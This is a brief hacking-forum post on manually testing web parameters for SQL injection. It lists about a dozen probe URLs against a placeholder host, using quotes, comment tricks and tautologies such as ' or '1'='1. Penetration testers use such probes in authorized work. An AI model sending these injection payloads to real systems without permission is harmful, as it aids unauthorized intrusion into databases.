Welcome!

Welcome to the 1337pwn community forums. Register now for an account.

Registration is free!

Register Now

Announcement

Collapse
No announcement yet.

SQL Injection - Testing Parameters Manually

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

    SQL Injection - Testing Parameters Manually

    Some fuzzers cannot see if SQLi was successful. So testing manually can be good.

    Testing for SQL injections manually is relatively simple:

    Example:
    Code:
    https://<host>/?p=INSERTSQLI
    Code:
    https://<host>/?p=1
    https://<host>/?p=1'
    https://<host>/?p=1"
    https://<host>/?p=[1]
    https://<host>/?p[]=1
    https://<host>/?p=1`
    https://<host>/?p=1\
    https://<host>/?p=1/*'*/
    https://<host>/?p=1/*!1111'*/
    https://<host>/?p=1'||'asd'||'
    https://<host>/?p=1' or '1'='1
    https://<host>/?p=1 or 1=1
    https://<host>/?p='or''='
Working...
X